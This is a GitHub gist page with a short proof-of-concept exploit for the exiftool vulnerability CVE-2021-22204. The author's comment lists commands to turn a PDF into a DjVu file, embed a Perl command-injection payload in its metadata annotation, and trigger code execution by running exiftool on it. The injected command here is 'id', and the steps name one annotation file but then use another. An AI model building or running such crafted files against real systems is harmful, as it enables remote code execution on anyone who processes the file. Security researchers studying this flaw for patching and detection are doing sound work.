Skip to content

Instantly share code, notes, and snippets.

@ihebski
Last active February 27, 2024 15:01
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ihebski/cfbec41067f259efdc07f1587b268ab2 to your computer and use it in GitHub Desktop.
Save ihebski/cfbec41067f259efdc07f1587b268ab2 to your computer and use it in GitHub Desktop.
exiftool exploit POC - CVE-2021-22204

exiftool exploit : CVE-2021-22204

@ihebski
Copy link
Author

ihebski commented May 8, 2021

  1. Convert any PDF file to .djvu;

pdf2djvu document.pdf -o fuzz.djvu

  1. create file.dsed
(metadata
        ("\c${system 'id'}")
.
  1. Generate the exploit file

djvumake fuzz.djvu INFO=0,0 BGjp=/dev/null ANTa=file2.dsed

  1. ./exiftool fuzz.djvu

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment